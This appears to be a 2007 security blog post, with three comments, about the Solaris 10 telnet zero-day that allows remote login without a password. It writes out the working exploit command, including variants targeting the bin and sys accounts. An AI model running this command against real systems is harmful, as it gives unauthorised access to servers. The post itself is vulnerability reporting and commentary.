Tuesday, February 13, 2007

How long does it take to remotely hack fully patched Solaris 10 installation with telnet enabled? As long as it takes to type this simple standard system command:

telnet -l"-fusername" host

i.e.

telnet -l"-fbin" solaris10-server

or

telnet -l"-fsys" 127.0.0.1

Yeh, it's that simple. Here's a screenshot:

Information about this 0-day vulnerability appeared on a security news list today and spread like wildfire.

Certainly, most organisations which take security seriously will use SSH and disable telnet. However, considering that this vulnerability affects a default system installation, it is likely that companies using Solaris 10 and not implementing strong security configuration, will be seriously affected.

That's truly a return of the "good" old days for hackers, when hacking into any server was a trivial task that required only a simple command. To see this type of vulnerability these days is extremely unusual and pretty much shocking for IT security community. Most of all, it is a terrible embarrassment for Sun Microsystems.

3 comments:

Tedi Heriyanto said...

Hi Marek,

You may aware that this vulnerability doesn't affect Solaris 2.6 - 9.0 as discussed in vulnerability mailing list (http://whitestar.linuxbox.org/pipermail/exploits/2007-February/000104.html).

Marek Bialoglowy said...

Sure, that's why I wrote "Solaris 10, 11" in the post title :-)

Old Monkey said...

LOL :) Yeah ... I have a Solaris Box at Home and had Telnet enabled. Luckly it is still the old Solaris 9.0 :)

web statistics